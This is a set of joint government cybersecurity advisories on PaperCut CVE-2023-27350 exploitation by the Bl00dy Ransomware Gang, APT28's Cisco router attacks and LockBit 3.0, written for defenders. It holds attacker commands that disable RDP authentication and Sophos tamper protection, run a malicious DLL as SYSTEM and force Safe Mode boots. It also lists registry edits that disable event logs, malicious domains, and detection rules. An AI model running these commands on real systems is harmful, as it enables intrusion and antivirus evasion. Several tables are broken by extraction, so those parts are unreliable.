Retrieves a list of domain trusts. |
ping.exe -4 -n 1 * |
Sends a single ICMP echo request packet to all devices on the local network using the IPv4 protocol. The output of the command will show if the device is reachable or not. |
quser; ([adsisearcher]"(ObjectClass=computer)").FindAll().count;([adsisearcher]"(ObjectClass=user)").FindAll().count;[Security.Principal.WindowsIdentity]::GetCurrent() | select name;net user "$env:USERNAME" /domain; (Get-WmiObject -class Win32_OperatingSystem).Caption; Get-WmiObject -Namespace rootcimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest /DOMAIN_TRUSTS |
Lists the current Windows identity for the logged-in user and displays the user's name. Uses the Active Directory Services Interface (ADSI) to search for all computer and user objects in the domain and returns counts of the quantities found. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. Lists information about the operating system installed on the local computer. Lists information about the "Domain Admins" group from the domain. Lists all domain controllers in the domain. Displays information about domain trusts. |
reg.exe add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal * ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f |
Adds/overwrites a new Registry value to disable user authentication for RDP connections. |
reg.exe add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /* v fAllowToGetHelp /t REG_DWORD /d 1 /f |
Adds/overwrites a new Registry value to allow a user to receive help from Remote Assistance. |
reg.exe add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSophos Endpoint * DefenseTamperProtectionConfig" /t REG_DWORD /v SAVEnabled /d 0 /f |
Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SAVEnabled. |
reg.exe add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSophos Endpoint * DefenseTamperProtectionConfig" /t REG_DWORD /v SEDEnabled /d 0 /f |
Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SEDEnabled. |
reg.exe ADD * HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeSophosSAVServiceTamperProtection /t REG_DWORD /v Enabled /d 0 /f |
Adds/overwrites a new registry value to disable tamper protection for a Sophos antivirus service called SAVService. |
reg.exe copy hklmsystemCurrentControlSetservicestvnserver * hklmsystemCurrentControlSetcontrolsafebootnetworktvnserver /s /f |
Copies the configuration settings for the tvnserver service to a new location in the registry that will be used when the computer boots into Safe Mode with Networking. This allows the service to run with the same settings in Safe Mode as it does in normal mode. |
s.exe /threads:50 /ldap:all /verbose /outfile:c:users<user>desktop1.txt |
Executes SharpShares. |
schtasks.exe /RU SYSTEM /create /sc ONCE /<user> /tr "cmd.exe /crundll32.exe c:programdatanetsh.dll,Entry" /ST 04:43 |
Creates a Scheduled Task run as SYSTEM at 0443 AM. When the task is run, cmd.exe uses crundll32.exe to run the DLL file netsh.dll. (It is likely that netsh.dll is a malware file and not associated with netsh.) |
start-process PowerShell.exe -arg C:UsersPublicMusic<file>.ps1 -WindowStyle Hidden |
Executes a PowerShell script, while keeping the PowerShell window hidden from the user. |
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and ACSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or ACSC.
]]>
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. PaperCut released a patch in March 2023.
According to FBI observed information, malicious actors exploited CVE-2023-27350 beginning in mid-April 2023 and continuing through the present. In early May 2023, also according to FBI information, a group self-identifying as the Bl00dy Ransomware Gang attempted to exploit vulnerable PaperCut servers against the Education Facilities Subsector.
This joint advisory provides detection methods for exploitation of CVE-2023-27350 as well and indicators of compromise (IOCs) associated with Bl00dy Ransomware Gang activity. FBI and CISA strongly encourage users and administrators to immediately apply patches, and workarounds if unable to patch. FBI and CISA especially encourage organizations who did not patch immediately to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.
Download the PDF version of this report:
CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on the following affected installations of PaperCut:[1]
PaperCut servers vulnerable to CVE-2023-27350 implement improper access controls in the SetupCompleted Java class, allowing malicious actors to bypass user authentication and access the server as an administrator. After accessing the server, actors can leverage existing PaperCut software features for remote code execution (RCE). There are currently two publicly known proofs of concept for achieving RCE in vulnerable PaperCut software:
FBI and CISA note that actors may develop other methods for RCE.
The PaperCut server process pc-app.exe
runs with SYSTEM- or root-level privileges. When the software is exploited to execute other processes such as cmd.exe
or powershell.exe
, these child processes are created with the same privileges. Commands supplied with the execution of these processes will also run with the same privileges. As a result, a wide range of post-exploitation activity is possible following initial access and compromise.
This CVE was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog on April 21, 2023.
Education Facilities Subsector entities maintained approximately 68% of exposed, but not necessarily vulnerable, U.S.-based PaperCut servers. In early May 2023, according to FBI information, the Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet. Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files (see Figure 1).
According to FBI information, legitimate remote management and maintenance (RMM) software was downloaded and executed on victim systems via commands issued through PaperCut’s print scripting interface. External network communications through Tor and/or other proxies from inside victim networks helped Bl00dy Gang ransomware actors mask their malicious network traffic. The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
Network defenders should focus detection efforts on three key areas:
SetupCompleted
page of an exposed and vulnerable PaperCut server.pc-app.exe
process.To exploit CVE-2023-27350, a malicious actor must first visit the SetupCompleted
page of the intended target, which will provide the adversary with authentication to the targeted PaperCut server. Deploy the following Emerging Threat Suricata signatures to detect when GET
requests are sent to the SetupCompleted
page. (Be careful of improperly formatted double-quotation marks if copying and pasting signatures from this advisory.)
Note that some of the techniques identified in this section can affect the availability or stability of a system. Defenders should follow organizational policies and incident response best practices to minimize the risk to operations while threat hunting.
alert http any any -> $HOME_NET any (
msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/app?service=page/SetupCompleted"; bsize:32; fast_pattern;
reference:cve,2023-27350;
classtype:attempted-admin;
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"page/SetupCompleted"; fast_pattern; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; reference:cve,2023-27350; classtype:attempted-admin; metadata:attack_target Server, cve CVE_2023_27350, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_05;)
Note that these signatures and other rule-based detections, including YARA rules, may fail to detect more advanced iterations of CVE-2023-27350 exploits. Actors are known to adapt exploits to circumvent rule-based detections formulated for the original iterations of exploits observed in the wild. For example, the first rule above detected some of the first known exploits of CVE-2023-27350, but a slight modification of the exploit’s GET request can evade that rule. The second rule was designed to detect a broader range of activity than the first rule.
The following additional Emerging Threat Suricata signatures are designed to detect Domain Name System (DNS) lookups of known malicious domains associated with recent PaperCut exploitation:
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowcsupdates .com)"; dns_query; content:"windowcsupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowcsupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdate .com)"; dns_query; content:"anydeskupdate.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdate.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdates .com)"; dns_query; content:"anydeskupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecemter .com)"; dns_query; content:"windowservicecemter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecemter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (winserverupdates .com)"; dns_query; content:"winserverupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)winserverupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (netviewremote .com)"; dns_query; content:"netviewremote.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)netviewremote.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (updateservicecenter .com)"; dns_query; content:"updateservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)updateservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecenter .com)"; dns_query; content:"windowservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecentar .com)"; dns_query; content:"windowservicecentar.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecentar.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
Note that these signatures may also not work if the actor modified activity to evade detection by known rules.
A child process is spawned under pc-app.exe
when the vulnerable PaperCut software is used to execute another process, which is the PaperCut server process. Malicious activity against PaperCut servers in mid-April used the RCE to supply commands to a cmd.exe
or powershell.exe
child process, which were then used to conduct further network exploitation. The following YARA rule may detect malicious activity[2].
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: “\pc-app.exe”
Image|endswith:
- “\cmd.exe”
- “\powershell.exe”
condition: selection
level: high
falsepositives:
- Expected admin activity
More advanced versions of the exploit can drop a backdoor executable, use living-off-the-land binaries, or attempt to evade the above YARA rule by spawning an additional child process in-between pc-app.exe
and a command-line interpreter.
Network defenders may be able to identify suspicious activity by reviewing the PaperCut server options to identify unfamiliar print scripts or User/Group Sync settings.
If the PaperCut Application Server logs have debug mode enabled, lines containing SetupCompleted
at a time not correlating with the server installation or upgrade may be indicative of a compromise. Server logs can be found in [app-path]/server/logs/*.*
where server.log
is normally the most recent log file.
Any of the following server log entries may be indicative of a compromise:
User "admin" updated the config key “print.script.sandboxed”
User "admin" updated the config key “device.script.sandboxed”
Admin user "admin" modified the print script on printer
User/Group Sync settings changed by "admin"
See Table 1 through Table 6 for IOCs obtained from FBI investigations and open-source information as of early May 2023.
Email Addresses |
decrypt.support@privyonline[.]com |
fimaribahundqf@gmx[.]com |
main-office@data-highstream[.]com |
prepalkeinuc0u@gmx[.]com |
tpyrcne@onionmail[.]org |
Tox ID |
E3213A199CDA7618AC22486EFECBD9F8E049AC36094D56AC1BFBE67EB9C3CF2352CAE9EBD35F |
IP Address |
Port |
>Date |
Description |
|
- |
April 2023 |
N/A |
|
- |
April 2023 |
Resolves to Tor node. Network communications with |
|
- |
April 2023 |
Resolves to datacenter Tor node. |
|
|
April 2023 |
Resolves to Tor node. Network communications with |
|
- |
April 2023 |
TrueBot C2. DiceLoader malware. |
|
- |
April 2023 |
TrueBot C2. DiceLoader malware. |
|
|
April 2023 |
Resolves to Tor node. Network communications with |
|
>443 |
April 2023 |
N/A |
|
|
April 2023 |
Outbound communications from |
|
|
April 2023 |
Resolves to Tor node. Network communications with |
|
- |
April 2023 |
N/A |
|
- |
April 2023 |
Cobalt Strike C2. |
|
- |
April 2023 |
Cobalt Strike C2. |
|
- |
April 2023 |
N/A |
|
443 |
April 2023 |
Resolves to Tor node. Network communications with |
|
9100, 443 |
April 2023 |
Outbound communications from |
|
- |
April 2023 |
File |
Malicious Domain |
Description |
anydeskupdate[.]com |
N/A |
anydeskupdates[.]com |
N/A |
ber6vjyb[.]com |
Associated with TrueBot C2 |
netviewremote[.]com |
N/A |
Associated with Cobalt Strike Beacon |
|
upd343.winserverupdates[.]com |
Associated with Cobalt Strike Beacon |
upd488.windowservicecemter[.]com |
Associated with TrueBot payload |
upd488.windowservicecemter[.]com/download/update.dll |
File: Cobalt Strike Beacon |
updateservicecenter[.]com |
N/A |
windowcsupdates[.]com |
N/A |
windowservicecemter[.]com |
Associated with TrueBot payload |
windowservicecentar[.]com |
N/A |
windowservicecenter[.]com |
N/A |
winserverupdates[.]com |
N/A |
winserverupdates[.]com |
N/A |
Command |
Description |
|
Launches |
|
Downloads |
|
Installs legitimate Atera RMM software on the system silently, with the specified email address and company ID properties. |
File |
SHA-256 |
Description |
|
N/A |
Unspecified files created in Tor directory |
|
6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15 |
Reverse SOCKS5 tunneler with TLS support (see https://github.com/kost/revsocks) |
|
N/A |
Unspecified content within servers.txt file; likely a list of proxy servers for |
|
c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125 |
TrueBot malware |
|
N/A |
Unknown file used to send outbound communications through Tor |
|
0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f |
Cobalt Strike Beacon |
If compromise is suspected or detected, organizations should:
FBI and CISA recommend organizations:
ACKNOWLEDGMENTS
The Multi-State Information Sharing and Analysis Center (MS-ISAC) contributed to this advisory.
REFERENCES
[1] PaperCut: URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)
[2] Huntress: Critical Vulnerabilities in PaperCut Print Management Software
This product is provided subject to this Notification and this Privacy & Use policy.
]]>The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.
We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.
Download the UK PDF version of this report:
Download the US PDF version of this report:
The NCSC has previously attributed the following activity to APT28:
For more information on APT28 activity, see the advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.
As of 2021, APT28 has been observed using commercially available code repositories, and post-exploit frameworks such as Empire. This included the use of PowerShell Empire, in addition to Python versions of Empire.
In 2021, APT28 used infrastructure to masquerade Simple Network Management protocol (SNMP) access into Cisco routers worldwide. This included a small number based in Europe, US government institutions and approximately 250 Ukrainian victims.
SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be misused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network.
A number of software tools can scan the entire network using SNMP, meaning that poor configuration such as using default or easy-to-guess community strings, can make a network susceptible to attacks.
Weak SNMP community strings, including the default "public," allowed APT28 to gain access to router information. APT28 sent additional SNMP commands to enumerate router interfaces. [T1078.001]
The compromized routers were configured to accept SNMP v2 requests. SNMP v2 doesn’t support encryption and so all data, including community strings, is sent unencrypted.
Exploitation of CVE-2017-6742
APT28 exploited the vulnerability CVE-2017-6742 (Cisco Bug ID: CSCve54313) [T1190]. This vulnerability was first announced by Cisco on 29 June 2017, and patched software was made available.
Cisco's published advisory provided workarounds, such as limiting access to SNMP from trusted hosts only, or by disabling a number of SNMP Management Information bases (MIBs).
For some of the targeted devices, APT28 actors used an SNMP exploit to deploy malware, as detailed in the NCSC’s Jaguar Tooth Malware Analysis Report. This malware obtained further device information, which is exfiltrated over trivial file transfer protocol (TFTP), and enabled unauthenticated access via a backdoor.
The actor obtained this device information by executing a number of Command Line Interface (CLI) commands via the malware. It includes discovery of other devices on the network by querying the Address Resolution Protocol (ARP) table to obtain MAC addresses. [T1590]
Please refer to the accompanying Malware Analysis Report for indicators of compromise which may help to detect this activity.
This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
For detailed TTPs, see the Malware Analysis Report.
Tactic |
ID |
Technique |
Procedure |
Initial Access |
Exploit Public-facing Application. |
APT28 exploited default/well-known community strings in SNMP as outlined in CVE-2017-6742 (Cisco Bug ID: CSCve54313). |
|
Initial Access |
Valid Accounts: Default Accounts. |
Actors accessed victim routers by using default community strings such as “public.” |
|
Reconnaissance |
Gather Victim Network Information |
Access was gained to perform reconnaissance on victim devices. Further detail of how this was achieved in available in the MITRE ATT&CK section of the Jaguar Tooth MAR. |
APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742 (Cisco Bug ID: CSCve54313) as published by Cisco.
TTPs in this advisory may still be used against vulnerable Cisco devices. Organizations are advised to follow the mitigation advice in this advisory to defend against this activity.
UK organizations should report any suspected compromises to the NCSC.
US organisations should contact CISA’s 24/7 Operations Centre at report@cisa.gov or (888) 282-0870.
Mitigation
This product is provided subject to this Notification and this Privacy & Use policy.
]]>Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.
LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.
LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.
LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.
Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].
During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:
LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.
After files are encrypted, LockBit 3.0 drops a ransom note with the new filename .README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].
Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.
LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. While rclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also be used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0 affiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).
File Sharing Site |
---|
https://www.premiumize[.]com |
https://anonfiles[.]com |
https://www.sendspace[.]com |
https://fex[.]net |
https://transfer[.]sh |
https://send.exploit[.]in |
LockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These tools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and Batch scripts
are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2 for a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations:
Tool | Description | MITRE ATT&CK ID |
---|---|---|
Chocolatey | Command-line package manager for Windows. | T1072 |
FileZilla | Cross-platform File Transfer Protocol (FTP) application. | T1071.002 |
Impacket | Collection of Python classes for working with network protocols. | S0357 |
MEGA Ltd MegaSync | Cloud-based synchronization tool. | T1567.002 |
Microsoft Sysinternals ProcDump | Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe. | T1003.001 |
Microsoft Sysinternals PsExec | Execute a command-line process on a remote machine. | S0029 |
Mimikatz | Extracts credentials from system. | S0002 |
Ngrok | Legitimate remote-access tool abused to bypass victim network protections. | S0508 |
PuTTY Link (Plink) | Can be used to automate Secure Shell (SSH) actions on Windows. | T1572 |
Rclone | Command-line program to manage cloud storage files | S1040 |
SoftPerfect Network Scanner | Performs network scans. | T1046 |
Splashtop | Remote-desktop software. | T1021.001 |
WinSCP | SSH File Transfer Protocol client for Windows. | T1048 |
The IOCs and malware characteristics outlined below were derived from field analysis. The following samples are current as of March 2023.
LockBit 3.0 Black Icon
LockBit 3.0 Wallpaper
LockBit Command Line Parameters
LockBit Parameters | Description |
---|---|
-del |
Self-delete. |
-gdel |
Remove LockBit 3.0 group policy changes. |
-gspd |
Spread laterally via group policy. |
-pass (32 character value) |
(Required) Password used to launch LockBit 3.0. |
-path (File or path) |
Only encrypts provided file or folder. |
-psex |
Spread laterally via admin shares. |
-safe |
Reboot host into Safe Mode. |
-wall |
Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note. |
When executed, LockBit 3.0 will create the mutex, Global,
and check to see if this mutex has already been created to avoid running more than one instance of the ransomware.
LockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges via elevated Component Object Model (COM) Interface. C:WindowsSystem32dllhost.exe is spawned with high integrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC.
For example, %SYSTEM32%dllhost.exe/Processid:{3E5FC7F9-9A51-4367-9063- A120244FBEC7}.
LockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies. LockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID to obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.
LockBit 3.0 Icon
Registry Key | Value | Data |
---|---|---|
HKCR. |
(Default) |
|
HKCRDefaultIcon |
(Default) |
C:ProgramData.ico |
LockBit 3.0 Wallpaper
Registry Key | Value | Data |
---|---|---|
HKCUControl PanelDesktopWallPaper |
(Default) |
C:ProgramData.bmp |
Disable Privacy Settings Experience
Registry Key | Value | Data |
---|---|---|
SOFTWAREPoliciesMicrosoftWin dowsOOBE |
DisablePrivacyE xperience |
0 |
Enable Automatic Logon
Registry Key | Value | Data |
---|---|---|
SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon |
AutoAdminLogon |
1 |
|
DefaultUserName |
|
|
DefaultDomainNa me |
|
|
DefaultPassword |
|
Disable and Clear Windows Event Logs
Registry Key | Value | Data |
---|---|---|
HKLMSOFTWAREMicrosoftWindows CurrentVersionWINEVTChannels * |
Enabled |
0 |
HKLMSOFTWAREMicrosoftWindows CurrentVersionWINEVTChannels * ChannelAccess |
ChannelAccess |
AO:BAG:SYD:(A;;0x1;; ;SY)(A;;0x5;;;BA)(A; ;0x1;;;LA) |
LockBit 3.0 File Path Locations |
---|
ADMIN$Temp.exe |
%SystemRoot%Temp.exe |
sysvolscripts.exe (Domain Controller) |
LockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host operating system, the following command is launched to reboot the system to Safe Mode with Networking:
Operating System | Safe Mode with Networking command |
---|---|
Vista and newer |
bcdedit /set {current} safeboot network |
Pre-Vista |
bootcfg /raw /a /safeboot:network /id 1 |
Operating System | Disable Safe mode reboot |
---|---|
Vista and newer |
bcdedit /deletevalue {current} safeboot |
Pre-Vista |
bootcfg /raw /fastdetect /id 1 |
The following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0 infection:
NetworkShares.xml |
---|
<NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"> |
Services.xml stops and disables services on the Active Directory (AD) hosts.
Services.xml |
---|
